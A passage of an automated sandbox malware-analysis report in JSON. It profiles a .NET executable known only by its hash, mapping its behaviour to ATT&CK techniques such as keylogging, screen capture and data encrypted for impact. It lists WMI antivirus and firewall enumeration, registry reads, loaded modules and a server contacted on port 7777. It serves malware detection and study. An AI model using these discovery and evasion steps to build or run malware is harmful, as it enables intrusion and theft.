"https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "File Transfer Protocols", "attck_id": "T1071.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/002", "malicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63D30000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75560000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\3b0592fc-14a1-4b8e-9803-69284ea2b6d2\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\3b0592fc-14a1-4b8e-9803-69284ea2b6d2\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 6000239-_~_, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 600023a-_~_, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 600023b-_~_, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 600023c-_~_, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 600023d-_~_, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 6000269-_~_, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 600026b-_~_, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 600026c-_~_, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"RPCRT4.DLL\" at base 768d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 768D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64990000\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 65140000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493\" was detected as \".NET\" and name: \"Library\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006120)\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006120)\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006120)\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"CreateDirectoryW\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:7777\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\V4.0\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" queries basic process information of the \"C:\\Windows\\System32\\cryptsp.dll\" (UID: 6120)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"NOCLIENTCHECKS\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\NET FRAMEWORK SETUP\\NDP\\V4\\FULL\"; Key: \"RELEASE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"129DBF173E38D9D37F8C66513290A30BC0790E9FDCDB5C9043A399EE6C889493\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"DISABLECONFIGCACHE\"; Value: \"\")\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file 